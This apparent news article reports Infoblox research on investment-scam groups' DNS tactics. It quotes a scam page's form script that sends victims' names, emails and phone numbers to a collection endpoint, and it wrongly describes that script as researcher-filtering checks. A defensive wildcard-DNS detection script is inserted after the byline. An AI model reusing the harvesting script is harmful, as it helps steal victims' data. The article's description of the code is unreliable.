These sophisticated scams, which include the notorious “pig butchering” schemes, deploy various attack vectors ranging from generic text messages to targeted social media advertisements, often using fake cryptocurrency platforms to defraud victims. Infoblox researchers identified two prominent threat actor groups, dubbed “Reckless Rabbit” and “Ruthless Rabbit”, who have developed distinctive techniques for operating these scams at scale. The scammers operate by creating convincing fake investment platforms, commonly referred to as “profit platforms,” designed to appear legitimate while harvesting personal and financial information from unsuspecting users.

The researchers documented how these actors employ registered domain generation algorithms (RDGAs) to create thousands of domains programmatically, allowing them to rapidly replace domains that get flagged or taken down by security systems. “Unlike traditional domain generation algorithms associated with malware, these RDGAs are a secret kept by the actor, who registers all the domain names,” explained the Infoblox threat intelligence team in their report. Many utilize sophisticated traffic distribution systems (TDS) that filter and redirect visitors based on their geolocation, potentially steering security researchers away from malicious content.

    $('form').submit(function (event){
        // Block the browser's normal form submission
        $(this).submit(false);
        event.preventDefault();
        event.stopPropagation();
        // Read the dial-code prefix from the phone-number widget, if present
        if($('.iti__selected-dial-code').length){
            var prefix = $('.iti__selected-dial-code').html().slice(1)
            $(this).append(` `)
        }
        // Append the page's hostname and full URL to the submitted data
        var host = `&host=${$(location).attr('hostname')}`
        var url = `&url=${$(location).attr('href')}`
        var args = host + url + so
        // POST the form fields to the collection endpoint
        $.ajax({
            type: "POST",
            url: ' ;.]tech/api/v1/submit/a6111ace-7304-4d9b-8dfe-9aafb7e9638e/',
            data: $(this).serialize() + args,
            success: function (response) {
                if (response.

This code reveals how the actors implement validation checks to filter out security researchers and ensure only viable targets proceed through the scam funnel.
Investment scams have emerged as the most costly form of fraud facing consumers, with the Federal Trade Commission reporting that victims lost a staggering US $5.7 billion in 2024 alone, a 24 percent increase from the previous year. These platforms typically feature embedded web forms that collect names, email addresses, and phone numbers, which are then used to progress victims through increasingly deceptive stages of the scam. Infoblox researchers noted that over 3 million RDGA domains have been observed on the internet, with many being used for investment scams. As investment scams continue to grow in both number and sophistication, understanding the DNS techniques employed by these threat actors becomes increasingly crucial for effective cybersecurity defenses.

The Reckless Rabbit actor, for instance, implements wildcard DNS responses to their domains, meaning any subdomain query (randomsubdomain.scamdomain.info) will return a valid response. This technique creates significant noise in DNS traffic, making it challenging for security tools to identify and block the actual malicious domains.

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
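The wildcard DNS behaviour attributed to Reckless Rabbit above can be spotted in passive DNS data, because many unrelated subdomain labels under one parent all resolve to the same answer. The following is an added example, not code from the Infoblox report or this article; the log records, the two-label parent_domain() shortcut and the thresholds are assumptions made for illustration.

```python
"""Flag parent domains that look wildcarded in passive DNS records."""
from collections import defaultdict

# Constructed sample records (queried name, answer IP); not real observations.
SAMPLE_LOG = [
    ("randomsubdomain.scamdomain.info", "203.0.113.10"),
    ("x7f3kq.scamdomain.info", "203.0.113.10"),
    ("login-9921.scamdomain.info", "203.0.113.10"),
    ("zzqpl.scamdomain.info", "203.0.113.10"),
    ("www.example.org", "198.51.100.5"),
    ("mail.example.org", "198.51.100.25"),
    ("api.example.org", "198.51.100.40"),
    ("cdn.example.org", "198.51.100.41"),
]

def parent_domain(name, labels=2):
    """Assumption: the registered domain is the last `labels` labels.
    Production code should consult the Public Suffix List instead."""
    parts = name.rstrip(".").lower().split(".")
    return ".".join(parts[-labels:])

def wildcard_candidates(records, min_subdomains=4, max_answers=1):
    """Return {parent: sorted answers} for parents where many distinct
    subdomains all resolve to the same small set of answers."""
    subs, answers = defaultdict(set), defaultdict(set)
    for name, ip in records:
        parent = parent_domain(name)
        if name.rstrip(".").lower() != parent:
            subs[parent].add(name.lower())
        answers[parent].add(ip)
    return {
        p: sorted(answers[p])
        for p in subs
        if len(subs[p]) >= min_subdomains and len(answers[p]) <= max_answers
    }

def collapse(records, flagged):
    """Cut the noise: names under a flagged parent become one '*.parent' entry."""
    out = set()
    for name, _ in records:
        parent = parent_domain(name)
        out.add(f"*.{parent}" if parent in flagged else name.lower())
    return sorted(out)

if __name__ == "__main__":
    flagged = wildcard_candidates(SAMPLE_LOG)
    print(flagged)
    print(collapse(SAMPLE_LOG, flagged))
```

A hit is only a candidate, since legitimate wildcard hosting produces the same pattern; resolving a freshly generated random label under the parent confirms whether the zone answers for everything.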
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 01 May 2025 15:30:05 +0000